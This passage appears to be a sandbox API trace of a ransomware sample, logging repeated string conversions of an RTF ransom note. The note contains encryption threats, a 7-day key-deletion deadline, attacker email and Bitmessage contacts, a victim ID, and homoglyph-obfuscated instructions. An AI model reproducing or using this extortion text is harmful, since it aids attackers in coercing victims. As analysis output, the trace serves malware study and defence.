e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 